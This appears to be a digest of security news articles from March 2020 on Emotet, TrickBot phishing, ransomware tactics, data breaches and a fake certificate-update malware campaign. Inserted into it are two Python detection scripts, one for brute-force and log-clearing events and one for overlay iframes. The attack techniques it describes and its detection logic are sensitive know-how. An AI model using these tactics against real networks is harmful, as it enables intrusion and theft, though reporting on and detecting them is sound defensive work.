"We’re aware of issues with signtool.exe after installing the latest optional update for Windows 10, version 1903 or Windows 10, version 1909 (KB4535996). If you are encountering issues or receiving errors related to signtool.exe, you can uninstall the optional update KB4535996. We are working on a resolution and estimate a solution will be available in mid-March."


Emotet Actively Using Upgraded WiFi Spreader to Infect Victims
7.3.2020 
Bleepingcomputer Virus

Emotet’s authors have upgraded the malware's Wi-Fi spreader by making it a fully-fledged module and adding new functionality as shown by samples recently spotted in the wild.

We previously reported that Emotet is now capable of spreading to new victims via nearby insecure wireless networks using a Wi-Fi worm module.

The recent updates to the module come after the same stand-alone spreader version was used by the Emotet gang for at least two years without noticeable changes as researchers at Binary Defense show in a report shared with BleepingComputer earlier this week.

This upgraded Wi-Fi worm module is already being used in the wild: Binary Defense threat researcher and Cryptolaemus contributor James Quinn told BleepingComputer that a researcher found evidence of the Emotet Wi-Fi spreader spreading throughout one of his client's networks.

New Emotet Wi-Fi spreader functionality
Besides converting it from a stand-alone binary into a malware module, the Emotet developers also gave the spreader more verbose debugging and made changes that, in theory, could allow it to deliver payloads other than the loader, which was the only payload the previous spreader version was known to deliver.

The spreader is now also capable of brute-forcing ADMIN$ shares on targeted networks when it fails brute-forcing a device's C$ share.

"Additionally, before the spreader attempts to brute-force C$/ADMIN$, it attempts to download, from a hardcoded IP, the service binary that it installs remotely," Binary Defense explains. "If this download fails, it sends the debug string “error downloading file” before quitting."

The malware's authors have also tweaked the service.exe binary used to drop Emotet on infected devices, now downloading the loader from the command-and-control (C&C) server and saving it on the compromised computer as firefox.exe, thus making sure that the latest loader version is being deployed.

This method is also used by Emotet developers "to avoid detections that may flag off the Emotet loader, but not the service executable."

Spreader bruteforcing shares
Image: Binary Defense
Binary Defense's research team also observed while analyzing the new Emotet samples that the binary used to deliver the loader and the spreader both featured the loader's hardcoded download URL within their strings, pointing at a previous Emotet version where their functionality was combined within a single binary.

The Emotet authors have also slightly altered the spreader's logging capabilities allowing its operators "to get step-by-step debugging logs from infected victims through the use of a new communication protocol."

This new comms protocol uses two PHP POST arguments delivering info on the bots' MachineGUID and debug strings generated by the malware during runtime.

Emotet's Wi-Fi spreader module updates are a sign that the malware's authors are now also focusing on adding new infection vectors for their malware loader besides the usual malicious documents delivered to targets via massive spam campaigns.

With the new focus on the spreader, Emotet's authors are on a straight path to developing an even more capable and dangerous Wi-Fi worm module that will most likely be spotted more and more by both researchers and victims while actively in the wild.

Emotet's Wi-Fi spreader in action (Binary Defense)
Emotet infections can lead to serious consequences
Emotet was originally a banking trojan first spotted during 2014 and it has evolved into a malware loader used to install various other malware families including the Trickbot banking Trojan (a known vector for delivering Ryuk ransomware payloads).

More recently, in late January, the malware was delivered in a malspam campaign that used the Coronavirus global health crisis as bait.

Also in January, the Cybersecurity and Infrastructure Security Agency (CISA) warned of increased activity related to targeted Emotet attacks.

The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC) also issued a warning on the dangers posed by Emotet attacks, saying that the malware "provides an attacker with a foothold in a network from which additional attacks can be performed, often leading to further compromise through the deployment of ransomware."

Emotet infection chain (CISA)
According to CISA, Emotet infections can lead to very serious outcomes if not immediately addressed including:

• temporary or permanent loss of sensitive or proprietary information,
• disruption to regular operations,
• financial losses incurred to restore systems and files, and
• potential harm to an organization’s reputation.

ACSC provides technical advice on Emotet with best practices to defend against infections, just as CISA does in the Emotet Malware alert issued earlier this year.

Emotet ranked first in a 'Top 10 most prevalent threats' ranking from interactive malware analysis platform Any.Run in December 2019, head and shoulders above the runner-up, the Agent Tesla info-stealer, with triple the number of sample uploads submitted for analysis.

More details on Emotet's upgraded Wi-Fi spreader, malware sample hashes, and YARA and SURICATA rules for threat detection are available in the Binary Defense report.


TrickBot Malware Targets Italy in Fake WHO Coronavirus Emails
7.3.2020 
Bleepingcomputer Spam  Virus

A new spam campaign is underway that is preying on the fears of Coronavirus (COVID-19) to target people in Italy with the TrickBot information-stealing malware.

When sending malicious spam, malware distributors commonly use current events, fears, and politics as themes for the emails to get recipients to open the attached malicious documents.

As there is no bigger news at this time than the spread of Coronavirus and the fears of becoming sick, a new malicious spam campaign has been created that pretends to be from a doctor at the World Health Organization (WHO).

These emails have the subject "Coronavirus: Informazioni importanti su precauzioni" and pretend to contain information about the precautions people in Italy should take to protect themselves from the Coronavirus.

Malicious Spam about Coronavirus
The email in Italian can be read below:

Gentile Signore/Signora,

A causa del fatto che nella Sua zona sono documentati casi di infezione dal coronavirus, l'Organizzazione Mondiale della Sanità ha preparato un documento che comprende tutte le precauzioni necessarie contro l'infezione dal coronavirus. Le consigliamo vivamente di leggere il documento allegato a questo messaggio!

Distinti saluti,
Dr. Penelope Marchetti (Organizzazione Mondiale della Sanità - Italia)
This translates to English as:

Dear Sir / Madam,

Due to the fact that cases of coronavirus infection are documented in your area, the World Health Organization has prepared a document that includes all necessary precautions against coronavirus infection. We strongly recommend that you read the document attached to this message!

With best regards,
Dr. Penelope Marchetti (World Health Organization - Italy)
According to new research by Sophos, attached to these emails is a malicious Word document that when opened states that you need to click on the 'Enable Content' button to properly view it.

Malicious Word document
Once a recipient clicks on 'Enable Content', though, malicious macros execute that extract various files to install and launch the Trickbot malware, as illustrated in the image below by Sophos.

From email to TrickBot infection
(Source: Sophos)
Once TrickBot is installed, it will harvest various information from a compromised computer and then attempt to spread laterally throughout a network to gather more data.

To perform this behavior, TrickBot downloads various modules, each with a specific task, such as stealing cookies, browser information, and OpenSSH keys, stealing the Active Directory Services database, and spreading to other computers.

After harvesting the network of all valuable data, TrickBot will eventually launch PowerShell Empire or Cobalt Strike to give the Ryuk Ransomware actors access to the infected computer.

After these actors perform further reconnaissance of the network, steal data, and gain admin credentials, they will deploy the Ryuk Ransomware and encrypt the files of all the computers on the network.

This is why TrickBot is such a dangerous computer infection: it is a two-fold attack, and both stages cause serious damage to your files and personal data.

People need to be suspicious of all emails that they receive and not open any attachment from someone they do not know without first confirming the email is legitimate. This can be done by calling the sender directly and confirming or by scanning the attachment with antivirus software or VirusTotal.

In heightened times of unrest and concern, users need to be even more diligent as there are always people looking to take advantage of a crisis to cause harm to another.


Windows 10 Insider Build 19577 Released With New Windows Security Icon
7.3.2020 
Bleepingcomputer OS

Microsoft has released Windows 10 Insider Preview Build 19577 to Insiders in the Fast ring, which includes the new Windows Security Fluent-based icon and diagnostic data changes.

If you are a Windows Insider in the Fast ring, you can update to the Insider Preview Build 19577 by going into Settings -> Update & Security -> Windows Update and then checking for new updates.

Windows 10 Insider Build 19577

To see the full release notes and fixes for this Windows 10 insider build, you can read the blog post.

The most notable changes found in this new build released to Windows Insiders in the Fast ring are detailed below.

Diagnostic data changes in Settings
Microsoft is changing the labeling of their diagnostic options in the 'Diagnostics & feedback' settings.

The 'Basic' settings will now be labeled 'Required' and the current 'Full' option will be renamed to 'Optional'.

For business users who set their diagnostic data setting to Optional, Microsoft will be releasing new Group Policies that allow more granular control over what data is collected in the organization.

More new icons: Windows Security
Microsoft has been releasing Fluent-based icons for various programs and apps such as File Explorer, OneDrive, Mail, Calendar, and Your Phone.

With this build, Microsoft is now releasing the new icon for Windows Security, which looks far nicer than the original in my opinion.

The new Windows Security icon as it appears on the taskbar.

Other changes
Other changes in this build include:

• Cortana gets assistant conversations that allow you to talk to Cortana in a more conversational format and ask things such as “tell me a dad joke”, “tell me a bedtime story”, or “rock, paper, scissors.”
• Microsoft has updated the behavior of Advanced startup (Settings > Update & Security > Recovery > Advanced startup “Restart now”) to enable some Ease of Access features to work properly. Now Advanced startup will boot directly into the Windows Recovery Environment.
• Microsoft continues their experiment with the new Windows 10 Optional Update experience and has extended it to run through March.


US Govt Adds Stricter Requirements for .gov Domain Registration
7.3.2020 
Bleepingcomputer BigBrothers

The U.S. government will start requiring notarized signatures as part of the registration process for .gov domains starting March 10, 2020, to prevent wire and mail fraud that might lead to such domains being registered by unauthorized organizations or individuals.

The U.S. General Services Administration (GSA) oversees the DotGov Program that operates the .GOV top-level domain (TLD) and it makes such domains available to US-based government organizations, from local municipalities to federal agencies.

Security boost for .gov domain registration
"Effective on March 10, 2020, the DotGov Program will begin requiring notarized signatures on all authorization letters when submitting a request for a new .gov domain," the DotGov Registrar says.

"This is a necessary security enhancement to prevent mail and wire fraud through signature forgery in obtaining a .gov domain.

"This step will help maintain the integrity of .gov and ensure that .gov domains continue to be issued only to official U.S. government organizations."

To request a .gov domain name, government organizations have to prepare and send an authorization letter and fill in an online form after receiving a .gov registrar account.

This letter must use official letterhead stationery and it has to include a signature from the requesting organization’s authorizing authority, the DotGov Program site explains.

This is the letter that will need to come with a notarized signature starting March 10, 2020, to prevent future attempts of registering .gov domains without authorization.

Anyone could register a .gov domain
The GSA says that .gov domains are exclusively granted to U.S. government organizations and they give legitimacy to government websites and online tools, ensuring the customers' trust that the content is from an official source.

However, as independent investigative journalist Brian Krebs previously reported, until the new rules are enacted, almost anyone can register a .gov domain using fake information on the authorization letter required by the GSA albeit illegally and with the risk of being indicted for wire or mail fraud if caught.

A researcher confirmed that this was possible, saying that he was able to register a .gov domain in November 2019 using a fake Google Voice number and a Gmail address, as well as official letterhead extracted from a legitimate government organization's documents.

"I never said it was legal, just that it was easy," the researcher said. "I assumed there would be at least ID verification. The deepest research I needed to do was Yellow Pages records."

When contacted, the GSA said that it "has already implemented additional fraud prevention controls," without detailing the measures taken to prevent future fraudulent .gov registration attempts.

The Cybersecurity and Infrastructure Security Agency (CISA) shared plans to take over the management of the .gov TLD from the GSA since "the .gov top-level domain (TLD) is critical infrastructure for thousands of federal, state and local government organizations across the country."

A bipartisan bill known as the "DOTGOV Act of 2019" and sponsored by US Senator Gary Peters was introduced in Senate on October 30, 2019, seeking, among other things, to provide CISA with the authority to manage the .gov TLD after assuming governance from the GSA.


Microsoft Issues Fix for Windows 10 Drivers Blocked by Core Isolation
7.3.2020 
Bleepingcomputer  OS

Microsoft has issued guidance on how to resolve problems loading drivers in Windows 10 that are being blocked due to virtualization-based security protections.

If your PC has a 64-bit processor and supports Intel VT-x or AMD-V virtualization, which is available in most modern CPUs, then Windows 10 offers extra virtualization-based security features.

One of these features is called Core Isolation, which uses hardware virtualization to isolate critical parts of the operating system's kernel from user-mode drivers and software running on the PC. When enabled, this prevents malware or exploits from gaining access to the secure kernel to bypass security controls, inject malware, or perform other malicious behavior.

Part of Core Isolation is a feature called 'Memory Integrity', which protects kernel memory from having malicious code injected into it by malware or other attacks.

"Memory integrity is a feature of Windows that ensures code running in the Windows kernel is securely designed and trustworthy. It uses hardware virtualization and Hyper-V to protect Windows kernel mode processes from the injection and execution of malicious or unverified code. The integrity of code that runs on Windows is validated by memory integrity, making Windows resistant to attacks from malicious software."

Memory Integrity may block drivers
When enabled, this feature locks down the computer and may prevent some drivers from operating properly or from loading at all.

In a new support bulletin, Microsoft explains that bugs or a minor and usually harmless vulnerability in a driver may cause the Memory Integrity feature to block it from loading.

When the driver is not loaded properly, Windows will log an error that states "A driver can't load on this device", which could lead to issues ranging from harmless to severe depending on the driver.

In situations like this, Microsoft recommends that you check for an updated driver that may have fixed the issue causing it to be blocked.

If that does not help, you can disable the Memory Integrity security feature so that the driver can load.

To disable Memory Integrity, please follow these steps:

• Open the Core Isolation page by going to Start > Settings > Update & Security > Windows Security > Device Security and then, under Core isolation, click on Core isolation details. Alternatively, you can click on this link in Windows 10 to open the Core Isolation settings page.

Core Isolation Settings

• When the Core Isolation settings page opens, toggle the Memory integrity setting to Off. Once you turn it off, Windows 10 will prompt you to restart your computer.

Prompt to restart Windows

• Restart your computer and the Memory Integrity feature will be turned off.

• At this point, check whether there are still issues loading the driver.

If the issue persists, you should contact your hardware manufacturer to find out if an updated driver will be made available soon.


Virgin Media Data Breach Exposes Info of 900,000 Customers
7.3.2020 
Bleepingcomputer  Incident

Virgin Media announced today that the personal information of roughly 900,000 of its customers was accessed without permission on at least one occasion because of a misconfigured and unsecured marketing database.

Virgin Media is a leading cable operator in the U.K. and Ireland. As of December 31, 2019, it delivered 14.6 million broadband, video, and fixed-line telephony services to approximately 6.0 million cable customers, as well as mobile services to 3.3 million subscribers, according to the company's preliminary Q4 2019 results.

Database exposed for almost a year
According to an ongoing investigation, Virgin Media discovered on February 28, 2020, that the exposed database was accessible from at least April 19, 2019, and it was recently accessed by an unauthorized party at least once although the company doesn't know "the extent of the access or if any information was actually used."

Lutz Schüler, CEO of Virgin Media, said in a press release that the company "immediately solved the issue by shutting down access to this database, which contained some contact details of approximately 900,000 people, including fixed-line customers representing approximately 15% of that customer base."

"The database did not include any passwords or financial details, such as credit card information or bank account numbers, but did contain limited contact information such as names, home, and email addresses and phone numbers," he added.

We are now contacting those affected to inform them of what happened. We urge people to remain cautious before clicking on an unknown link or giving any details to an unverified or unknown party. - Lutz Schüler, CEO of Virgin Media

Exposed customer information
The database was used to store and manage information on existing and potential Virgin Media customers and it included:

• contact details (such as name, home and email addresses, and phone numbers)

• technical and product information

• customers' dates of birth (in a very small number of cases)

"Please note that this is all of the types of information in the database, but not all of this information may have related to every customer," Virgin Media says.

The company also says that the unsecured database was not used to store customer passwords or financial details, like bank account numbers or credit card information.

Virgin Media advises customers who think that they might have been victims of identity theft to reach out to their bank or credit card company to inform them of any out-of-the-ordinary transactions or applications made in their name without their knowledge.

Customers were also warned over e-mail that they might be targeted by phishing attacks, fraud, or nuisance marketing communications.

Earlier today, T-Mobile also announced a data breach caused by an email vendor that got hacked and exposed the personal and financial info of some of its customers.


Microsoft Shares Tactics Used in Human-Operated Ransomware Attacks
7.3.2020 
Bleepingcomputer  Ransomware

Microsoft today shared tips on how to defend against human-operated ransomware attacks known to be behind hundreds of millions of dollars in losses following campaigns targeting enterprises and government entities.

Ransomware families such as Sodinokibi (REvil), Samas, Bitpaymer, DoppelPaymer, Dharma, and Ryuk are deployed by human operators, which makes these attacks a lot more dangerous than auto-spreading ransomware like NotPetya, WannaCry, or those installed via malware and phishing attacks.

This is because the actors that manually infiltrate an organization's IT infrastructure can adapt to the challenges posed by security defenses and can push further into the targeted environment using techniques such as privilege escalation and credential dumping.

"They exhibit extensive knowledge of systems administration and common network security misconfigurations, perform thorough reconnaissance, and adapt to what they discover in a compromised network," the Microsoft Defender Advanced Threat Protection (ATP) Research Team says.

"They take advantage of similar security weaknesses, highlighting a few key lessons in security, notably that these attacks are often preventable and detectable."

Microsoft shared information on the different entrance vectors and post-exploitation methods used by the operators behind DoppelPaymer, Dharma, and Ryuk, and showed that there's an overwhelming overlap in the security misconfigurations they abuse as part of their devastating attacks.

To show the actual impact ransomware had on its victims, after analyzing collected ransomware ransom notes and cryptocurrency wallets, the FBI said at last week's RSA security conference that victims have paid more than $140 million to ransomware operators during the past six years.

Ryuk ransomware deployment techniques and tactics
Ryuk is the most dangerous ransomware family of the three highlighted by Microsoft, with the FBI saying that its operators were able to collect over $61 million in ransoms from their victims; the real total is certainly much larger, since the agency did not have access to all of the Ryuk ransom notes and wallets.

This ransomware family is one of the potential malware payloads delivered onto systems infected with the Trickbot Trojan.

"At the beginning of a Ryuk infection, an existing Trickbot implant downloads a new payload, often Cobalt Strike or PowerShell Empire, and begins to move laterally across a network, activating the Trickbot infection for ransomware deployment," Microsoft explains.

Also, the operators will not immediately deploy the ransomware payload on the victims' networks after the Trickbot infections occur but they will instead wait weeks or even months after the infiltration has started.

This happens because, in many cases, the targets completely ignore the initial Trickbot infection, seeing it as a low-priority threat, which allows the attackers to collect a lot more data and information.

Once the attack starts, the actors will start a network surveillance process and will attempt to move laterally throughout the network using Cobalt Strike or PowerShell to collect info for credential theft.

Ryuk ransom note

Ryuk attack chain
"The attackers then continue to move laterally to higher-value systems, inspecting and enumerating files of interest to them as they go, possibly exfiltrating this data," Microsoft adds. "The attackers then elevate to domain administrator and utilize these permissions to deploy the Ryuk payload."

"The Ryuk operators use stolen Domain Admin credentials, often from an interactive logon session on a domain controller, to distribute the Ryuk payload.

"They have been seen doing this via Group Policies, setting a startup item in the SYSVOL share, or, most commonly in recent attacks, via PsExec sessions emanating from the domain controller itself."

Dharma and DoppelPaymer TTPs
One of the groups that use Dharma ransomware in their attacks (a group tracked as PARINACOTA by Microsoft) is highly active and it has been observed by the Redmond researchers deploying the ransomware on the systems of at least three or four organizations every week.

Microsoft says that during 18 months of monitoring, PARINACOTA was observed while changing "tactics to match its needs and use compromised machines for various purposes, including cryptocurrency mining, sending spam emails, or proxying for other attacks."

This group's operators will most commonly use brute force attacks against servers reachable over the internet via the Remote Desktop Protocol (RDP).

After infiltrating an organization's network, they start scanning for other RDP servers and brute force their way into those too, turning off security controls and moving laterally to other systems after a network reconnaissance stage.

They will then steal credentials to gain administrative privileges so that they can toggle off security solutions, and will start deploying backdoors for persistence, as well as coin miners and spammers, using the compromised machines as part of large-scale spam and illicit mining campaigns.

Only after going through all these stages and running their spam and mining operations for a few weeks, PARINACOTA will deploy the Dharma ransomware to encrypt the organizations' systems, after first deleting local backups.

Dharma ransom note

Dharma attack chain
DoppelPaymer ransomware is delivered within victims' networks by its human operators using previously stolen user credentials with high privileges and tools like Group Policy and PsExec.

The operators "often abuse service accounts, including accounts used to manage security products, that have domain admin privileges to run native commands, often stopping antivirus software and other security controls," Microsoft says.

"The presence of banking Trojans like Dridex on machines compromised by DoppelPaymer point to the possibility that Dridex (or other malware) is introduced during earlier attack stages through fake updaters, malicious documents in phishing email, or even by being delivered via the Emotet botnet."

Even though Dridex is most likely used as part of the infiltration process, RDP brute force artifacts have also been observed by Microsoft while monitoring the actors' activities and analyzing some of the impacted networks.

The operators will also often deploy their payloads on networks previously compromised by other attackers months before the systems get encrypted with DoppelPaymer.

"The success of attacks relies on whether campaign operators manage to gain control over domain accounts with elevated privileges after establishing initial access," Microsoft adds.

This is done via credential theft attacks powered by Mimikatz, LaZagne, and other credential dumping tools, and via privilege escalation by gaining control of admin accounts.

DoppelPaymer ransom note

DoppelPaymer attack chain
As Microsoft notes, DoppelPaymer attacks will not encrypt all systems on compromised networks. Instead, the operators will deploy a ransomware payload on a limited subset and an even smaller set of the infected machines will have their files encrypted.

Additionally, "the attackers maintain persistence on machines that don’t have the ransomware and appear intent to use these machines to come back to networks that pay the ransom or do not perform a full incident response and recovery."

The DoppelPaymer operators have also launched a data leak site in February 2020 to be used to shame victims who don't pay the ransoms and publish files stolen from their computers before encryption.

This move is part of a new trend started by Maze Ransomware in November 2019 and later adopted by operators of other ransomware like Sodinokibi, Nemty Ransomware, and BitPyLock.

Defense measures against human-operated ransomware attacks
Microsoft advises security teams and admins at organizations that might be targeted in the future by this type of ransomware campaign to take defensive measures designed to block common attack techniques or at least dramatically reduce their effectiveness.

The Microsoft Defender Advanced Threat Protection (ATP) Research Team recommends implementing these mitigation measures against human-operated ransomware attacks:

• Harden internet-facing assets:
- Apply latest security updates
- Use threat and vulnerability management
- Perform regular audits and remove privileged credentials

• Thoroughly investigate and remediate alerts:
- Prioritize and treat commodity malware infections as potential full compromise

• Include IT Pros in security discussions:
- Ensure collaboration among SecOps, SecAdmins, and IT admins to configure servers and other endpoints securely

• Build credential hygiene:
- Use MFA or NLA, and use strong, randomized, just-in-time local admin passwords
- Apply principle of least-privilege

• Monitor for adversarial activities:
- Hunt for brute force attempts
- Monitor for cleanup of Event logs
- Analyze logon events

• Harden infrastructure:
- Use Windows Defender Firewall
- Enable tamper protection
- Enable cloud-delivered protection
- Turn on attack surface reduction rules and AMSI for Office VBA
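The three "Monitor for adversarial activities" items above (brute force attempts, Event log cleanup, logon events) expressed as hunting logic over Security-log records; this is an added example, not Microsoft's code. Event IDs 4625, 4624 and 1102 are the standard Windows Security IDs; the sample records, the thresholds, and the privileged-account and domain-controller watchlists are constructed assumptions.

```python
"""Hunt over Windows Security event records for three signals Microsoft recommends
watching: RDP brute force, clearing of the Security log, and privileged interactive
logons on domain controllers (the pattern seen before Ryuk deployment)."""
from collections import defaultdict
from datetime import datetime, timedelta


def _ev(time, eid, host, user, ip=None, logon_type=None):
    """Minimal record shape a SIEM would parse out of the Security channel."""
    return {"time": time, "id": eid, "host": host, "user": user, "ip": ip, "logon_type": logon_type}


# Constructed sample data: one noisy password-guessing burst followed by a success
# and a log wipe on the DC, plus benign failed logons from a workstation user.
SAMPLE_EVENTS = [
    *[_ev(f"2020-03-06T02:00:{s:02d}", 4625, "DC01", "administrator", "203.0.113.7", 10)
      for s in (1, 9, 15, 22, 31, 40)],
    _ev("2020-03-06T02:01:05", 4624, "DC01", "administrator", "203.0.113.7", 10),
    _ev("2020-03-06T02:20:00", 1102, "DC01", "administrator"),          # Security log cleared
    *[_ev(f"2020-03-06T08:30:{s:02d}", 4625, "WS12", "jsmith", "198.51.100.5", 2)
      for s in (0, 12, 40)],                                              # a few typos, below threshold
    _ev("2020-03-06T08:31:00", 4624, "WS12", "jsmith", "198.51.100.5", 2),
]

PRIVILEGED_ACCOUNTS = {"administrator", "svc_backup"}  # assumption: the org's Tier-0 accounts
DOMAIN_CONTROLLERS = {"DC01"}                           # assumption: hosts that should never see admin RDP


def _ts(event):
    return datetime.fromisoformat(event["time"])


def hunt_brute_force(events, threshold=5, window=timedelta(minutes=5)):
    """Return {source_ip: {"failures": n, "succeeded": bool}} for every source that
    produced `threshold` or more 4625 failures inside one sliding `window`.
    `succeeded` is True when a 4624 from the same source follows the burst, which is
    the case worth treating as a compromised account rather than mere noise."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=_ts):
        if e["id"] in (4624, 4625) and e["ip"]:
            by_ip[e["ip"]].append(e)
    findings = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e["id"] == 4625]
        for i, start in enumerate(fails):
            in_window = [f for f in fails[i:] if _ts(f) - _ts(start) <= window]
            if len(in_window) >= threshold:
                burst_end = _ts(in_window[-1])
                succeeded = any(e["id"] == 4624 and _ts(e) >= burst_end for e in evs)
                findings[ip] = {"failures": len(fails), "succeeded": succeeded}
                break
    return findings


def hunt_log_clearing(events):
    """Event 1102 is written when the Security log is cleared; it survives the wipe
    because it is the first record in the fresh log. Returns (host, time, user)."""
    return [(e["host"], e["time"], e["user"]) for e in events if e["id"] == 1102]


def hunt_privileged_interactive_logons(events, privileged=PRIVILEGED_ACCOUNTS, dcs=DOMAIN_CONTROLLERS):
    """Flag 4624 logons of type 2 (interactive) or 10 (RemoteInteractive/RDP) by a
    privileged account onto a domain controller. Returns (host, user, type, time)."""
    return [(e["host"], e["user"], e["logon_type"], e["time"]) for e in events
            if e["id"] == 4624 and e["logon_type"] in (2, 10)
            and e["user"].lower() in privileged and e["host"] in dcs]


if __name__ == "__main__":
    for ip, info in hunt_brute_force(SAMPLE_EVENTS).items():
        print(f"brute force from {ip}: {info['failures']} failures, success after burst: {info['succeeded']}")
    for host, when, user in hunt_log_clearing(SAMPLE_EVENTS):
        print(f"Security log cleared on {host} at {when} by {user}")
    for host, user, ltype, when in hunt_privileged_interactive_logons(SAMPLE_EVENTS):
        print(f"privileged logon type {ltype} by {user} on {host} at {when}")
```

On the constructed sample all three hunts fire against DC01 and none against the workstation; raise `threshold` or shrink `window` to tune the brute-force rule for your own failure baseline.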


PwndLocker Ransomware Gets Pwned: Decryption Now Available
7.3.2020 
Bleepingcomputer  Ransomware

Emsisoft has discovered a way to decrypt files encrypted by the new PwndLocker Ransomware so that victims can recover their files without paying a ransom.

We were the first to report about a relatively new ransomware called PwndLocker that was encrypting organizations and cities around the world and then demanding ransoms ranging from $175,000 to over $660,000 depending on the size of the network.

PwndLocker Ransom Note
Among these victims is Lasalle County, Illinois who was hit with a 50 bitcoin ransom ($442,000) and the City of Novi Sad, Serbia who had over 50TB of data encrypted.

Flaw found in ransomware
After analyzing the PwndLocker ransomware, Emsisoft's Fabian Wosar was able to spot a weakness in the malware that allows victims to recover their files without paying the ransom.

To receive help with the ransomware, Wosar told BleepingComputer that victims need to send him a copy of the ransomware executable that was used in the attack.

Unfortunately, after deploying the ransomware the attackers are deleting this executable.

Victims may be able to recover the executable using Shadow Explorer or file recovery tools. When searching for the executable, victims should look in the %Temp%, C:\User folders, and %Appdata% folders.

Once an executable is found, victims can contact Emsisoft to receive help.


Attackers Deliver Malware via Fake Website Certificate Errors
7.3.2020 
Bleepingcomputer  

Cybercriminals are distributing malware using fake security certificate update requests displayed on previously compromised websites, attempting to infect potential victims with backdoors and Trojans using a malicious installer.

The attackers bait their targets with a "NET::ERR_CERT_OUT_OF_DATE" error message presented in an iframe displayed over the site's actual contents, asking them to install a security certificate to allow the connection to succeed.

Security certificates (also known as digital certificates or identity certificates) are issued by Certification Authorities (CAs) and used to authenticate a website's server and to set up encrypted communication between a user's browser and that server.

When digital certificates are out of date and not renewed, web browsers display a notification letting the users know of the decrease in the security of their connection to the website.

Malware campaign active for at least two months
Security researchers at Kaspersky have found the earliest signs of this campaign to be dating from January 16, 2020, with various types of websites being compromised and used to deliver malware to victims, from auto part stores to the site of a zoo.

"The alarming notification consists of an iframe — with contents loaded from the third-party resource ldfidfa[.]pw — overlaid on top of the original page," the researchers found. "The URL bar still displays the legitimate address."

The code that the operators behind this campaign inject, disguised as a jquery.js script, overlays the malicious iframe at exactly the same size as the compromised web page.

Fake digital certificate error
Image: Kaspersky
"The iframe content is loaded from the address https[:]//ldfidfa[.]pw//chrome.html," the researchers add. "As a result, instead of the original page, the user sees a seemingly genuine banner urgently prompting to install a certificate update."
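As an added example (not Kaspersky's code or anything taken from the campaign), the following Python checks a page for the pattern described above: an iframe that loads from a different host than the page itself and is styled to cover the whole viewport. The HTML fragment and the host names are constructed placeholders; the ".invalid" and ".example" names are reserved and never resolve.

```python
"""Flag full-page overlay iframes from foreign hosts in server-side HTML.
Useful as a periodic integrity check on a site's rendered pages."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed page fragment modelled on the injection described above: a
# script posing as jquery.js adds a full-size iframe from another origin.
SAMPLE_HTML = """
<html><body>
<h1>Parts catalogue</h1>
<iframe src="https://cdn.widgets.example/map.html" width="300" height="200"></iframe>
<script src="/js/jquery.js"></script>
<iframe id="ovr" src="https://third-party.invalid/chrome.html"
        style="position:fixed; top:0; left:0; width:100%; height:100%; z-index:9999; border:0"></iframe>
</body></html>
"""


class _IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def _covers_page(style):
    """True when inline CSS positions the element out of flow and sizes it
    to the full width and height (percent or viewport units)."""
    s = style.replace(" ", "").lower()
    positioned = "position:fixed" in s or "position:absolute" in s
    full = ("width:100%" in s and "height:100%" in s) or \
           ("width:100vw" in s and "height:100vh" in s)
    return positioned and full


def find_overlay_iframes(html, page_host):
    """Return the src of every iframe that loads from a host other than the
    page's own AND is styled to cover the whole page."""
    collector = _IframeCollector()
    collector.feed(html)
    hits = []
    for attrs in collector.iframes:
        src = attrs.get("src") or ""
        host = urlsplit(src).hostname or page_host   # relative src -> same host
        if host != page_host and _covers_page(attrs.get("style") or ""):
            hits.append(src)
    return hits


if __name__ == "__main__":
    print(find_overlay_iframes(SAMPLE_HTML, "shop.example"))
```

The check deliberately ignores small embedded iframes (maps, widgets) from other hosts and only flags ones sized to hide the real page; a site that legitimately uses full-page iframes would need an allow list of expected hosts.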

If the targets fall for the attackers' tricks and click the "Install (Recommended)" button under the fake warning message, they will download a Certificate_Update_v02.2020.exe binary that will infect them with malware instead of solving the made-up security certificate error.

While monitoring these attacks, Kaspersky found that victims are infected with the Buerak Trojan downloader, which downloads and installs more malware onto infected computers.

The Mokes backdoor was also spread as a malicious payload during early January and used by the attackers to download additional malware, steal the victims' credentials, capture keystrokes, record ambient audio every 5 minutes, take screenshots, and intercept information entered in the web browser.

More details about this campaign and indicators of compromise (IOCs) including malware hashes and command-and-control server domain info are available at the end of Kaspersky's analysis.


T-Mobile Data Breach Exposes Customer's Personal, Financial Info
7.3.2020 
Bleepingcomputer  Incident

T-Mobile has announced a data breach caused by an email vendor being hacked that exposed the personal and financial information for some of its customers.

In 'Notices of Data Breach' posted to their web site, T-Mobile states that their email vendor was hacked and an unauthorized person was able to gain access to T-Mobile employees' email accounts.

Some of the email accounts that were hacked contained T-Mobile customer information such as social security numbers, financial information, government ID numbers, billing information, and rate plans.

To alert customers of the data breach, yesterday T-Mobile began texting customers affected by the data breach. These texts state that T-Mobile "recently identified and shut down a security event involving some of your account information" and contain a link to a page containing more information.

T-Mobile Data Breach Notification Text
Source: Reddit
These text messages contain a link to one of the two "Notice of Data Breach" pages on T-Mobile's site depending on what data was exposed.

Users who had their financial information exposed are directed to https://www.t-mobile.com/responsibility/consumer-info/pii-notice.

"The personal information accessed could include names and addresses, Social Security numbers, financial account information, and government identification numbers, as well as phone numbers, billing and account information, and rate plans and features."

Those whose financial information was not impacted are directed to https://www.t-mobile.com/responsibility/consumer-info/cpni-notice.

"The information accessed may have included customer names and addresses, phone numbers, account numbers, rate plans and features, and billing information. Your financial information (including credit card information) and Social Security number were not impacted."

Please note that the bolding in the quotes above was added by BleepingComputer to illustrate the difference between the two notices.

For customers whose financial information was exposed, T-Mobile is offering a free two-year subscription to the myTrueIdentity online credit monitoring service.

For customers who did not have financial information exposed, T-Mobile is not offering anything.

While the data breach notifications do not indicate that passwords were accessed, I strongly suggest you change your password at t-mobile.com. If you use the same password at other sites, change it there as well, to a unique password for each site.

All customers impacted by this data breach should be on the lookout for targeted phishing scams. These phishing scams could pretend to be from T-Mobile or use the accessed information to gain your information at other companies.

It is not known how many T-Mobile customers were affected or when the breach occurred.

BleepingComputer has contacted T-Mobile for more information but has not heard back as of yet.

Prior T-Mobile data breaches
In 2018, T-Mobile customers were affected by a data breach after an unauthorized user hacked into the T-Mobile systems.

During this attack, the attacker was able to gain access to customer names, billing ZIP codes, phone numbers, email addresses, account numbers, and account types (prepaid or postpaid).

